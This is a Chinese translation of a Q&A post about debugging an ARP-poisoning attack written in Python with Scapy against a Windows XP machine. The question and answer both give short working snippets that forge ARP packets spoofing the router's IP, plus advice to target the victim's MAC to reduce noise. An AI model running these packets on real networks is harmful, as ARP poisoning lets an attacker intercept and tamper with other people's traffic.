[英]Scapy arp poisoning not working for me
我正在使用Scapy攻击带有Backtrack 5的Windows XP计算机。
现在是我的代码:
#! /usr/bin/env python
from scapy.all import *
arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
上面的代码实际上出于某种原因发送了两个数据包。 我的回溯Mac曾经问过:
谁拥有192.168.0.106 (受害者的IP) ? 告诉192.168.0.108 (Backtrack的IP-不应该是!) 。
然后他从受害者那里得到“正在”答复。
而我的原路第二次问我:
谁拥有192.168.0.106 (受害者的IP) ? 告诉192.168.0.1 (路由器的IP)。
然后他再次从受害者那里得到“正在”答复。
然后受害者的ARP表必须具有相同mac但不同IP的行,一个是Backtrack的真实IP,第二个是路由器的IP。
为什么会这样呢?
您看到的第一个ARP
数据包来自Scapy,因为它想在send()
ing ARP
数据包之前用受害者的MAC地址填充Ether
帧。
如果您不希望发生这种情况,请尝试( sendp
在第2层发送):
>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))
您可以将ETHER_BROADCAST
替换为受害者的MAC地址,从而减少“噪音”。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.